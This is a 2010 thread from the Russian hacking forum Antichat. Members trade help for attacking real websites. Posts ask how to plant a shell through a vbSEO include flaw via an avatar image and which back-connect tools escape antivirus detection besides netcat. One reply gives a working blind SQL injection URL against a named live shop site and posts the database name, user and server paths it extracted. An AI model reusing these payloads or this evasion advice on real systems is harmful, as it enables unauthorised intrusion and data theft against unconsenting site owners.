HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.04.2010, 16:25
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

Цитата:
Сообщение от Gorev  
да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля
Вот видишь, как помогло!

http://forums.ibresource.ru/index.php?act=Print&client=printer&f=30&t=6657

Мотай до первого упоминания "ppassword".
Как видно, этот дополнительный код забит в самом файле, поэтому без возможности чтения файлов на серваке ты его не узнаешь.
 
Ответить с цитированием

  #2  
Старый 05.04.2010, 16:36
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

да уже сам вкурил что к чему...тот же форум почитал...читалка не робит , так что шансы на заливку шелла урезались очень сильно.Но в любом случае спасибо большое з аоказанную помосйь и потерянное время.
 
Ответить с цитированием

  #3  
Старый 05.04.2010, 17:31
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

Хочу применить всем ивестную дыру в vbseo 3.3.2 (инклуд). Но столкнулся с проблемов. Когда хочу поставить картинку с шеллом себе на аватар пишет:

Цитата:
Пределы измерений для этого типа файла составляют 100 на 100. Мы не можем уменьшить ваш файл, поэтому сделайте это самостоятельно и загрузите снова. Сейчас размеры вашего файла составляют 8236 на 8230.
хотя и размеры правильные и все остальное.

Как решить эту проблему?
 
Ответить с цитированием

  #4  
Старый 05.04.2010, 19:02
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами: 9288289

Репутация: 40
По умолчанию

Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом.
Читал что можно через netwox но так и не разобрался как. Знающие подскажите!
 
Ответить с цитированием

  #5  
Старый 05.04.2010, 19:33
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

Есть альтернативная версия netcat (просто заново скомпилированная - она не детектится). Еще есть mocat. Поищи в гугле.
 
Ответить с цитированием

  #6  
Старый 05.04.2010, 19:50
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

Помогите please докрутить скуль

http://www.nnovia.com/products.php?id=31%20and%201=2
 
Ответить с цитированием

  #7  
Старый 05.04.2010, 20:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
 
Ответить с цитированием

  #8  
Старый 05.04.2010, 21:24
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
а таблицы с юзверями там всеравно нет.....
 
Ответить с цитированием

  #9  
Старый 05.04.2010, 21:26
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

2 Pashkela thanks.

Я ввожу твою строку

http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

и на экране ничего не выводится. или эта конструкция работает только с тулзой?

Последний раз редактировалось Darren; 06.04.2010 в 00:00..
 
Ответить с цитированием

  #10  
Старый 05.04.2010, 21:30
Atra Pluvia
Banned
Регистрация: 05.04.2010
Сообщений: 1
С нами: 8474682

Репутация: 0
По умолчанию

Цитата:
Сообщение от Darren  
Pashkela thanks.

а от чего зависит
+and+substring(version(),1,1)=3
+and+substring(version(),1,1)=4
или?
+and+substring(version(),1,1)=5
От того, какая версия мускула стоит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.